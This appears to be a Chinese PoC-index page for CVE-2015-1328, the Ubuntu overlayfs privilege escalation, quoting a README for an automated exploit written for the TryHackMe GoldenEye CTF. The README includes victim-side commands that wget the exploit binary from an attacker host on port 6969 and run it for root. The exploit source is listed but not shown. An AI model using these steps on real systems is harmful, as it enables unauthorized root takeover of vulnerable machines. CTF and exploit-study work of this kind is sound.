POC详情: 75034f451564bbe489a455686397060dbd305682

来源
关联漏洞
标题: Ubuntu overlayfs组件提权漏洞 (CVE-2015-1328)
描述:Ubuntu是英国科能(Canonical)公司和Ubuntu基金会共同开发的一套以桌面应用为主的GNU/Linux操作系统。 Ubuntu 15.04及之前版本中的linux数据包3.19.0至21.21版本的overlayfs组件存在本地提权漏洞,该漏洞源于该文件系统没有正确检查文件权限。本地攻击者可利用该漏洞获取系统的管理员权限,完全控制受影响计算机。
描述
kernel exploit
介绍
# CVE-2015-1328-GoldenEye


# about exploit:
The overlayfs implementation in the linux (aka Linux kernel) package before 3.19.0-21.21 in Ubuntu through 15.04 does not properly check permissions for file creation in the upper filesystem directory, which allows local users to obtain root access by leveraging a configuration in which overlayfs is permitted in an arbitrary mount namespace. 

Thanks to rebel

# Config

This is an automated exploit for CVE-2015-1328 for GoldenEye CTF from TryHackMe 
by default, gcc isn't available in that machine so, i configured the gcc to cc and accordingly ran the exploit to gain root privileges.

# Simply clone the repo and run exploit.sh 

# On Attacker's machine:

Installation

Just, Clone this repository - 

    $ git clone https://github.com/0x1ns4n3/CVE-2015-1328-GoldenEye.git
    $ cd CVE-2015-1328-GoldenEye
    $ chmod +x exploit.sh
    $ bash exploit.sh
    
    
# On Victim's machine :

    $ wget http://<target ip>:6969/exploit
    
    $ chmod +x exploit
    
    $ ./exploit

文件快照

[4.0K] /data/pocs/75034f451564bbe489a455686397060dbd305682 ├── [4.9K] exploit.c ├── [ 64] exploit.sh └── [1.0K] README.md 0 directories, 3 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。